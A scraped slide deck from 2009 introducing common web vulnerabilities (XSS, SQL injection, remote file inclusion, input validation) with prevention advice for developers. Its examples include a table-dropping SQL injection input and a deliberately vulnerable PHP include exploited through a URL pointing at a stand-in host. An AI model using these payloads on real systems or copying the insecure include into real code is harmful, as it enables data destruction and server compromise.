Successfully reported this slideshow.
We use your LinkedIn profile and activity data to personalize ads and to show you more relevant ads. You can change your ad preferences anytime.

Security Tech Talk

1,015 views

Published on

Describes the most common web vulnerabilities and solutions for the same

Published in: Education, Technology
  • Be the first to comment

Security Tech Talk

  1. 1. Web Security: Tech Talk Mallik http://codeinspections.blogspot.com March 20 th , 2009
  2. 2. Introduction <ul><li>Web applications are accessible openly on web there by making it more prone to hacking. </li></ul><ul><li>Web Developers are not well versed with security issues because of which the applications are prone to vulnerabilities. </li></ul><ul><li>Web applications run in the browser, any security loop hole in browser will lead to exploiting vulnerability in web application. </li></ul>
  3. 3. Where do security bugs hide ? Functional Bugs Security Bugs Design Implementation
  4. 4. Web Vulnerabilities <ul><li>XSS (Cross Site Scripting) Attack [44%] </li></ul><ul><li>SQL Injection [25%] </li></ul><ul><li>Input Validation [8%] </li></ul><ul><li>Remote File Inclusion [17%] </li></ul><ul><li>Cookie Theft [3%] </li></ul>
  5. 5. XSS (Cross Site Scripting) <ul><li>XSS : code injection by malicious web users into the web pages. </li></ul><ul><li>Non Persistent: These holes show up when data provided by a web client is used immediately by server-side scripts to generate a page of results for that user. </li></ul><ul><li>Ex: Search Engines [exploits using social engineering] </li></ul><ul><li>Example </li></ul><ul><li>Persistent: XSS vulnerability that exists when data provided to a web application by a user is stored persistently on the server </li></ul><ul><li>Ex: Blogger Comments </li></ul><ul><li>Example </li></ul>
  6. 6. XSS (Cross Site Scripting) <ul><li>Exploits </li></ul><ul><li>Session Hijacking / Cookie Theft [ Example ] </li></ul><ul><li>Redirecting the page to hacker’s desired location [persistent] </li></ul><ul><li>[ Example ] </li></ul>
  7. 7. Preventing XSS <ul><li>Escaping/Filtering Some of characters like <,> as we do for Portal Application </li></ul><ul><li>Replacing characters < with &lt; and > with &gt; </li></ul><ul><li>Both the above solutions prevent users from entering rich HTML content which is required for many web 2.0 Products </li></ul><ul><li>Escape HTML tags which can be malicious like <script>, <meta> etc. Blogger, MySpace are some with this kind of implementation. </li></ul>
  8. 8. SQL Injection <ul><li>SQL Injection is a security vulnerability occurring in the DB layer. It is method to inject SQL command/query through the webpage. Hacker can come up with an intelligent input which may cause the application to do what it is not supposed to do. </li></ul><ul><li>Examples: </li></ul><ul><li>Incorrect escaping/Filtering: </li></ul><ul><li>Query: statement = &quot;SELECT * FROM users WHERE name = '&quot; + userName + &quot;';&quot; </li></ul><ul><li>Hacker’s input: a’ OR ‘x’=x </li></ul><ul><li>Final Statement = SELECT * FROM users WHERE name = ‘a’ OR ‘x’=x’; </li></ul>
  9. 9. SQL Injection <ul><li>More Serious attack: </li></ul><ul><li>Query: statement = &quot;SELECT * FROM users WHERE name = '&quot; + userName + &quot;';&quot; </li></ul><ul><li>Hacker’s input: a’; Drop Table Users; Select * from Users where name like ‘% </li></ul><ul><li>Final Statement = SELECT * FROM users WHERE name = ‘ a’; Drop Table Users; Select * from Users where name like ‘% ’ </li></ul>
  10. 10. Preventing SQL Injection <ul><li>Escaping Special Characters </li></ul><ul><li>Error-prone way to prevent injections is to escape dangerous characters. </li></ul><ul><li>- Replacing ‘ with ‘’ </li></ul><ul><li>- In MYSQL, use mysql_real_escape_string() to escape special characters </li></ul><ul><li>Using Parameterized Statements </li></ul><ul><li>myCommand = new SqlCommand(&quot;SELECT * FROM USERS WHERE USERNAME=@username AND PASSWORD= @password&quot;, myConnection)) { </li></ul><ul><li>myCommand.Parameters.AddWithValue(&quot;@username&quot;, user); myCommand.Parameters.AddWithValue(&quot;@password&quot;, pass); </li></ul>
  11. 11. Remote File Inclusion <ul><li>RFI vulnerabilities allow hackers to run their code on the web servers. </li></ul><ul><li>XSS is code injection on client side, whereas RFI is on server side. </li></ul><ul><li>Bad coding practice where filenames were sent as Query parameters can be used as any normal variable in the code. </li></ul><ul><li>This was one of common PHP vulnerabilities in early days. </li></ul>
  12. 12. RFI Example <ul><li><?php </li></ul><ul><li>$file=$_REQUEST[‘file’]; </li></ul><ul><li>include ($file.&quot;php&quot;); </li></ul><ul><li>?> </li></ul><ul><li>URL: http://test.com/test.php?file=http://hack.com/hack.php? </li></ul><ul><li>The code in hack.php would get executed on the server </li></ul>
  13. 13. Input Validation <ul><li>Most of security vulnerabilities are because of Hacky input. </li></ul><ul><li>Input Validation on Client Side (javascript) alone will not suffice. We need to have check for user input on both Client and Server. </li></ul><ul><li>Hacker can disable the checks on client side and send invalid input to Server Side. ( Example ) </li></ul><ul><li>Example: </li></ul><ul><li>Shopping site example about how serious a attack can be if there is no server side check. </li></ul>
  14. 14. Security Vulnerability Via Browser Bugs <ul><li>Browser bugs can sometimes lead to finding vulnerabilities in the Web Applications </li></ul><ul><li>Example is Cross-Domain XMLHTTP Vulnerability in First version of Chrome </li></ul><ul><li>What is Cross-Domain XMLHTTP ? </li></ul><ul><li>What was bug in Chrome Version 1.0 ? </li></ul><ul><li> Example </li></ul>
  15. 15. Lessons to Learn <ul><li>Web Security is not Rocket science </li></ul><ul><li>Validate Input </li></ul><ul><li>Validate output </li></ul><ul><li>Watch for New Security Attacks and how they affect your products </li></ul>
  16. 16. Thank You

×